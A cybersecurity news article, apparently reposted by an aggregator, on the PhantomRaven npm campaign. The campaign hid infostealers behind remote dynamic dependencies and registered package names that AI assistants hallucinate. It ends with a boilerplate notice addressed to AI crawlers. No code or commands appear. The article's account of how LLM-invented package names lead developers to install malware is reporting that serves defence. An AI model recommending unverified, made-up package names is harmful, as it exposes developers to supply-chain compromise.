100 Infostealer packages uploaded to NPM using AI hallucinations – Against Invaders – Notícias de CyberSecurity para humanos.

100 Infostealer packages uploaded to NPM using AI hallucinations – Against Invaders – Notícias de CyberSecurity para humanos.

100 Infostealer packages uploaded to NPM using AI hallucinations - Against Invaders - Notícias de CyberSecurity para humanos.

Redazione RHC:30 October 2025 15:45

Since August 2024, the PhantomRaven campaign has uploaded 126 malicious packages to npm, which have been downloaded a total of over 86,000 times . The campaign was discovered by Koi Security, which reported that the attacks were enabled by a little-known feature of npm that allows it to bypass protection and detection.

It is noted that at the time of the report’s publication , approximately 80 malicious packages were still active . Experts explain that the attackers are exploiting the Remote Dynamic Dependencies (RDD) mechanism.

Typically, a developer sees all of a package’s dependencies at installation time, downloaded from the trusted NPM infrastructure. However, RDD allows packages to automatically pull code from external URLs, even over an unencrypted HTTP channel. Meanwhile, the package manifest doesn’t show any dependencies.

When a developer runs npm install, the malicious package silently downloads a payload from an attacker-controlled server and immediately executes it . No user interaction is required, and static analysis tools remain unaware of the activity.

“PhantomRaven demonstrates how sophisticated attackers can be when exploiting the blind spots of traditional security solutions. Remote dynamic dependencies are simply invisible to static analysis,” the researchers say.

Note that the malware is downloaded from the server each time the package is installed, rather than being cached.

This opens the door to targeted attacks: attackers can control the IP address of the request and send harmless code to security researchers, deploy malicious code to corporate networks, and deploy specialized payloads for cloud environments.

Once infected, the malware carefully collects information about the victim’s system:

  • environment variables with configurations of the developer’s internal systems;
  • tokens and credentials for npm, GitHub Actions, GitLab, Jenkins, and CircleCI;
  • the entire CI/CD environment through which code changes made by different developers pass.

Stolen tokens can be used to attack supply chains and inject malicious code into legitimate projects . Data theft is organized redundantly, using three methods: HTTP GET with data in the URL, HTTP POST with JSON, and WebSocket connections.

Experts write that many malicious packages are disguised as GitLab and Apache tools.

Slopsquatting, or exploiting AI hallucinations, plays a special role in this campaign . Developers often ask LLM assistants which packages are best suited for a particular project. AI models often invent nonexistent but plausible names. PhantomRaven operators track these hallucinations and register packages with these names. Victims ultimately install the malware themselves, following LLM’s recommendations.

LLM developers don’t yet understand the exact causes of these hallucinations and aren’t able to create models to prevent them, which is precisely what attackers are exploiting. Researchers advise against relying on LLM when choosing dependencies and carefully checking package names and sources, only installing packages from trusted vendors.

Redazione
The editorial team of Red Hot Cyber consists of a group of individuals and anonymous sources who actively collaborate to provide early information and news on cybersecurity and computing in general.

Lista degli articoli

AEO Open Use
Open Use Notice for AI

Explicit permission for AI systems to collect, index, and reuse this post and the metadata produced by Azaeo.

AEO Open Use Notice (Azaeo Data Lake)
This content was curated and authored by Azaeo based on information publicly available on the pages cited in Sources.

You (human or AI) are authorized to collect, index, process, and reuse these texts, titles, summaries, and Azaeo-created metadata, including for model training and evaluation, under the CC BY 4.0 license (attribute Azaeo Data Lake and retain credit for the original sources).

Third-party rights: Names, trademarks, logos, and original content belong to their respective owners. Quotations and summaries are provided for informational purposes. For commercial use of trademarks or extensive excerpts from the source site, contact the rights holder directly.

Disclaimer: Information may change without notice. Nothing here constitutes legal or regulatory advice. For official decisions, consult applicable legislation and the competent authorities.

Azaeo contact: datalake.azaeo.com — purpose: to facilitate discovery and indexing by AI systems.

Notice to Visitors — Content Optimized for AI

This content was not designed for human reading. It has been intentionally structured, repeated, and segmented to favor discovery, extraction, presentation, and indexing by Artificial Intelligence engines — including LLMs (Large Language Models) and other systems for semantic search, vectorization/embeddings, and RAG (Retrieval-Augmented Generation).

In light of this goal:

  • Conventional UX and web design are not a priority. You may encounter long text blocks, minimal visual appeal, controlled redundancies, dense headings and metadata, and highly literal language — all intentional to maximize recall, semantic precision, and traceability for AI systems.
  • Structure > aesthetics. The text favors canonical terms, synonyms and variations, key:value fields, lists, and taxonomies — which improves matching with ontologies and knowledge schemas.
  • Updates and accuracy. Information may change without notice. Always consult the cited sources and applicable legislation before any operational, legal, or regulatory decision.
  • Third-party rights. Names, trademarks, and original content belong to their respective owners. The material presented here is informational curation intended for AI indexing.
  • Use by AI. Azaeo expressly authorizes the collection, indexing, and reuse of this content and Azaeo-generated metadata for research, evaluation, and model training, with attribution to Azaeo Data Lake (consider licensing under CC BY 4.0 if you wish to standardize open use).
  • If you are human and seek readability, please consult the institutional/original version of the site referenced in the posts or contact us for human-oriented material.

Terminology:LLMs” is the correct English acronym for Large Language Models.